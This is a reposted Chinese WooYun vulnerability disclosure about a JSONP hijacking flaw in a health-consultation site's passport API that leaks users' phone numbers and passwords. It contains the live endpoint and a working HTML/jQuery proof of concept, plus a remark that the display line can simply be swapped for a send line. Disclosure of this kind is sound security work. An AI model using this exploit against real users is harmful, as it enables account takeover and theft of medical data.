记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

寻医问药接口验证不严可劫持获取任意用户手机号、密码

2015-08-12 00:05

抓包时,过滤搜索到了这个接口

code 区域
http://api.passport.xywy.com/n_userHeaderGet.php?callback=1&a=u&uid=60356754



x1.jpg



手机号、邮箱、密码、注册日期...全部在里面(PS:我没绑定邮箱)

不过这个接口有一个麻烦点,其中有一个uid参数,尝试去掉uid访问,结果为空。也就是说,查询了当前的uid并且验证了cookie,无法越权。



但是这并不影响,此问题可以达到指哪打哪的效果,只是需要交互,然而这并不难。



x2.jpg





你可以任意挑选一个人审查元素得到他的uid构造链接。



POC:(PS:测试POC需要将uid改成自己或需要攻击的人)



真实场景下,将输出语句改成发送语句即可~~

code 区域
<!DOCTYPE html>

<html>

<head>

<script src="https://code.jquery.com/jquery-1.9.1.min.js"></script>

<meta charset="GBK">

<title>POC</title>

</head>

<body>

<p>result:</p>

<script>

$.getJSON('http://api.passport.xywy.com//n_userHeaderGet.php?a=u&uid=60356754&callback=?',function(json){

document.body.appendChild(document.createElement('p')).innerHTML=json.username+"<br/>"+json.insert_data+"<br/>"+json.userphone+"<br/>"+json.passwd;



})

</script>

</body>

</html>



漏洞证明:

x3.jpg





获取的密码可以成功登陆他人账号,导致用户敏感信息,健康档案、曾咨询的病情等。

危害较大,求不小厂商。

修复方案:

瘦子快给我发礼物!

知识来源: www.wooyun.org/bugs/wooyun-2015-0123836

阅读:96952 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“寻医问药接口验证不严可劫持获取任意用户手机号、密码”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云

本页关键词